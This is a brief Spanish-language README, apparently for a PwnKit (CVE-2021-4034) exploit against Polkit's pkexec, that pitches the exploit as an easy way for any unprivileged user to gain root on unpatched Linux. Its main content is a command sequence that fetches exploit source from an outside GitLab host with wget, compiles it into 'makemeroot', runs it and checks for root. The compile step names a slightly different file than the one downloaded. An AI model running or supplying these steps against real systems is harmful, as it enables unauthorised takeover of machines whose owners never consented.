
Explotación de escalada de privilegios local para CVE-2021-4034 (PWNKIT) dirigida a pkexec de Polkit, que permite a usuarios sin privilegios obtener acceso root en sistemas Linux vulnerables.
CVE-2021-4034 (PWNKIT)
Una vulnerabilidad de corrupción de memoria en pkexec de Polkit, que permite a cualquier usuario sin privilegios obtener privilegios completos de root en un sistema vulnerable utilizando la configuración predeterminada de polkit.
Fácil de usar, escalada de privilegios local en cualquier sistema linux sin parchear.
wget https://gitlab.com/nelox/pwnkit-vulnerability/blasty-vs-pkexec.c
gcc bblasty-vs-pkexec.c -o makemeroot
./makemeroot
whoami